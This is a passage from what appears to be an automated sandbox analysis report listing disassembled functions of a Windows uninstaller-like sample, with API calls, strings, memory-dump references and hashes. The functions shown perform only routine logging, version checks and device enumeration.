                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Find$ClosePrivateProfileString$FileNext__mbsicmp_l_sprintf
                                  • String ID: %s\%s$FALSE
                                  • API String ID: 2684535348-4291076793
                                  • Opcode ID: 82ac924632df853af5369712427009cf178ecc16cedbae88c394f82af38511d1
                                  • Instruction ID: 21b61f3dd5f55edc61df04606d4f1aeb069ce02906b8ccbb035aa67c08a1ecb5
                                  • Opcode Fuzzy Hash: 82ac924632df853af5369712427009cf178ecc16cedbae88c394f82af38511d1
                                  • Instruction Fuzzy Hash: DB014FB2604745ABD625EBA18C81BFFB3ACABD8705F40492EF54591182EF3CA504879E
                                  Function 00407950 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39threadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00407969
                                  • GetParent.USER32(?), ref: 00407981
                                  • GetParent.USER32(00000000), ref: 0040798A
                                  • SendMessageA.USER32(?,?,00000000,00000000), ref: 0040799C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ParentTime_fputs$DebugFormatLocalMessageMutexObjectOutputProcessReleaseSendSingleStringThreadWaitWindow_fprintf
                                  • String ID: cbSendMessage
                                  • API String ID: 2181095343-2246082812
                                  • Opcode ID: fb26cb892c85bc734de4647c14734d24df7937c4897327c9421542cf58473694
                                  • Instruction ID: 06ed15bc2b8a797047f8e388e478ba72d8cd5ec83bedfd46cde82965149ec734
                                  • Opcode Fuzzy Hash: fb26cb892c85bc734de4647c14734d24df7937c4897327c9421542cf58473694
                                  • Instruction Fuzzy Hash: 16F090B26042106BE610EB689C04FABB39CEF94761F10843AF811E2190D738AC15C7EA
                                  Function 00406610 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00406643
                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040664F
                                  Strings
                                  • GetNativeSystemInfo, xrefs: 00406649
                                  • kernel32.dll, xrefs: 0040663B
                                  • UninstCommandClass::NvGetNativeSystemInfo, xrefs: 00406611
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$AddressDebugFormatHandleLocalModuleMutexObjectOutputProcReleaseSingleStringWait_fprintf
                                  • String ID: GetNativeSystemInfo$UninstCommandClass::NvGetNativeSystemInfo$kernel32.dll
                                  • API String ID: 3434995589-933751508
                                  • Opcode ID: 8e1377ebac1bf6fa16063cf62fdd9611524483b82d37302de87c57162efe5555
                                  • Instruction ID: 07b19cc5b88e1f98c90bb973b2309d50f3cdd7225fb9d65a882ee8fb25741b4f
                                  • Opcode Fuzzy Hash: 8e1377ebac1bf6fa16063cf62fdd9611524483b82d37302de87c57162efe5555
                                  • Instruction Fuzzy Hash: 28F017F1940B009FC7A0DF759804A87BAE4EF283117008D3EE09AC7650E378E695CB9A
                                  Function 004123C4 Relevance: 7.6, APIs: 5, Instructions: 100COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __lock.LIBCMT ref: 004123D9
                                    • Part of subcall function 00411A2D: __mtinitlocknum.LIBCMT ref: 00411A41
                                    • Part of subcall function 00411A2D: __amsg_exit.LIBCMT ref: 00411A4D
                                    • Part of subcall function 00411A2D: EnterCriticalSection.KERNEL32(?,?,?,004137E4,00000004,00423408,0000000C,00411AB1,0040B462,0040B462,00000000,00000000,00000000,0040EF46,00000001,00000214), ref: 00411A55
                                  • __mtinitlocknum.LIBCMT ref: 00412419
                                  • __malloc_crt.LIBCMT ref: 0041245D
                                  • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00412482
                                  • EnterCriticalSection.KERNEL32(03482198,004233E8,00000010,0040C37E,00423128,0000000C,0040C3F8,00403EE1,00403EE1,00000040,00403EE1,0042AB38,0041C928), ref: 004124AC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CriticalEnterSection__mtinitlocknum$CountCritInitSpin___crt__amsg_exit__lock__malloc_crt
                                  • String ID:
                                  • API String ID: 1486408876-0
                                  • Opcode ID: 6f052533b2ef852cd1347e1d0f4184a5303911cc643afbad2bfd3d9e180b2912
                                  • Instruction ID: 8b8edbc94bf58287f8ef56951384a72dc4c5d74ea4bb63998c27d515b7f6380f
                                  • Opcode Fuzzy Hash: 6f052533b2ef852cd1347e1d0f4184a5303911cc643afbad2bfd3d9e180b2912
                                  • Instruction Fuzzy Hash: 3D31A3716007099FC721DF6AD8C199AB7E4FF09324750412EE555E72A1CBB8A8E2CF98
                                  Function 0040D9CE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __lock.LIBCMT ref: 0040D9EC
                                    • Part of subcall function 00411A2D: __mtinitlocknum.LIBCMT ref: 00411A41
                                    • Part of subcall function 00411A2D: __amsg_exit.LIBCMT ref: 00411A4D
                                    • Part of subcall function 00411A2D: EnterCriticalSection.KERNEL32(?,?,?,004137E4,00000004,00423408,0000000C,00411AB1,0040B462,0040B462,00000000,00000000,00000000,0040EF46,00000001,00000214), ref: 00411A55
                                  • ___sbh_find_block.LIBCMT ref: 0040D9F7
                                  • ___sbh_free_block.LIBCMT ref: 0040DA06
                                  • HeapFree.KERNEL32(00000000,?,004231F0,0000000C,00411A0E,00000000,004233A8,0000000C,00411A46,?,?,?,004137E4,00000004,00423408,0000000C), ref: 0040DA36
                                  • GetLastError.KERNEL32(?,004137E4,00000004,00423408,0000000C,00411AB1,0040B462,0040B462,00000000,00000000,00000000,0040EF46,00000001,00000214,?,?), ref: 0040DA47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                  • String ID:
                                  • API String ID: 2714421763-0
                                  • Opcode ID: 97e2bab8730f36fe53706a0f4dd7e957d16a37df18db58d550bf2025971d0a04
                                  • Instruction ID: ceaecf4fe780958945edd3fa282c0d33966a55e95548f13cfadf50fcd95cd63e
                                  • Opcode Fuzzy Hash: 97e2bab8730f36fe53706a0f4dd7e957d16a37df18db58d550bf2025971d0a04
                                  • Instruction Fuzzy Hash: F1017C71F09305AADF30BFA29806BAE3BA49F10368F54403AF414761D1DB7C89888E9D
                                  Function 00403DF0 Relevance: 7.5, APIs: 5, Instructions: 30filesynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00403B02,?,00000000,?), ref: 00403E03
                                  • UnmapViewOfFile.KERNEL32(?,?,00403B02,?,00000000,?), ref: 00403E10
                                  • CloseHandle.KERNEL32(?,?,00403B02,?,00000000,?), ref: 00403E2B
                                  • ReleaseMutex.KERNEL32(?,?,00403B02,?,00000000,?), ref: 00403E39
                                  • CloseHandle.KERNEL32(?,?,00403B02,?,00000000,?), ref: 00403E46
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseHandle$FileMutexObjectReleaseSingleUnmapViewWait
                                  • String ID:
                                  • API String ID: 3150930710-0
                                  • Opcode ID: 26ffad49355b307d25efd377c84a7e3a22a0bf69562ba92032e3062b1166bfd1
                                  • Instruction ID: 05e884570b166271adac5bfa94f30d0153a294086ffaf45edf2fb31eb31ec10a
                                  • Opcode Fuzzy Hash: 26ffad49355b307d25efd377c84a7e3a22a0bf69562ba92032e3062b1166bfd1
                                  • Instruction Fuzzy Hash: A0F0F9716002159BC328CF68EE888523B68FB1C3613904339E925C37F0D7B55892CF9D
                                  Function 00401C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78COMMON
                                  Download Yara Rule
                                  APIs
                                  • _sprintf.LIBCMT ref: 00401D29
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                    • Part of subcall function 004011F0: _memset.LIBCMT ref: 00401242
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_memset_sprintf
                                  • String ID: CommandClass::SetValue(%s = %s)$Set %s=%s$SetValue: Out of memory adding new variable
                                  • API String ID: 3581153556-703628852
                                  • Opcode ID: 422a770fef11c5b367a2b0ac569877368e3c132bf4508b6668efda4086a354be
                                  • Instruction ID: 7f5883e76c0dc7cf640b94d19f0afc6c49d3325744ded207a184114ad69e305a
                                  • Opcode Fuzzy Hash: 422a770fef11c5b367a2b0ac569877368e3c132bf4508b6668efda4086a354be
                                  • Instruction Fuzzy Hash: 6F2167B12006409BD224E769DC41FA7B3EDFFC8744F10442EF786A72D2D678A90587A9
                                  Function 00404270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetFileVersionInfoSizeA.VERSION(?,?,00000000,00010009,00260010), ref: 0040428C
                                  • GetFileVersionInfoA.VERSION(?,00000000,00000000,00000000,?,00000000,00010009,00260010), ref: 004042B8
                                  • VerQueryValueA.VERSION(00000000,0041CD3C,?,?,?,00000000,00000000,00000000,?,00000000,00010009,00260010), ref: 004042D1
                                  Strings
                                  • UninstCommandClass::CheckForUpdate, xrefs: 00404275
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: FileInfoTimeVersion_fputs$DebugFormatLocalMutexObjectOutputQueryReleaseSingleSizeStringValueWait_fprintf
                                  • String ID: UninstCommandClass::CheckForUpdate
                                  • API String ID: 390915327-2234398207
                                  • Opcode ID: 58a65281a1afe59366b94f5c874218a32b1037e4b62f1dc5815b83c8e0e7e6f2
                                  • Instruction ID: 45b6b8b460cf9b9f2c3a22d5026d2bdd2545ed4350fbf2acbd65fac45d841d09
                                  • Opcode Fuzzy Hash: 58a65281a1afe59366b94f5c874218a32b1037e4b62f1dc5815b83c8e0e7e6f2
                                  • Instruction Fuzzy Hash: BC01C2712401012BD600E605AC82CBBB79CEEE1794F44063FFD45A6282E639ED59D6FA
                                  Function 00401660 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • MessageBoxA.USER32(?,?,?,00000000), ref: 004016FA
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMessageMutexObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: CommandClass::PrintfBox$Silent$Yes
                                  • API String ID: 2910436740-4266728942
                                  • Opcode ID: 6bdcd1bbe5071bfaaa46752f55c13263a32194412c514db5d8ae3a83c72bb58e
                                  • Instruction ID: a7c1a89c27a306ffefd4404720fae03179d5bfec73edaeecf6328410b922e383
                                  • Opcode Fuzzy Hash: 6bdcd1bbe5071bfaaa46752f55c13263a32194412c514db5d8ae3a83c72bb58e
                                  • Instruction Fuzzy Hash: 1901A5B160074097C664AB149C42BEB73E9FFC4709F44883EB585921C1EF3CA40887DA
                                  Function 004066D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 00406720
                                  • SetupDiGetDeviceInstanceIdA.SETUPAPI(?,?,?,00000400,00000000), ref: 0040673A
                                  Strings
                                  • Current Device, xrefs: 00406749
                                  • UninstCommandClass::EnumDeviceCallBack, xrefs: 0040670A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugDeviceFormatInstanceLocalMutexObjectOutputReleaseSetupSingleStringWait_fprintf_memset
                                  • String ID: Current Device$UninstCommandClass::EnumDeviceCallBack
                                  • API String ID: 804095468-2669295411
                                  • Opcode ID: fb33fe03fecdb48a442d81562763ffb33676ca2b3e6f392daa12439bd6c8b69e
                                  • Instruction ID: 77090c3c9e5cc70321a5bd7babb8a529f2d091f2cc6f08800587ee826afcbc82
                                  • Opcode Fuzzy Hash: fb33fe03fecdb48a442d81562763ffb33676ca2b3e6f392daa12439bd6c8b69e
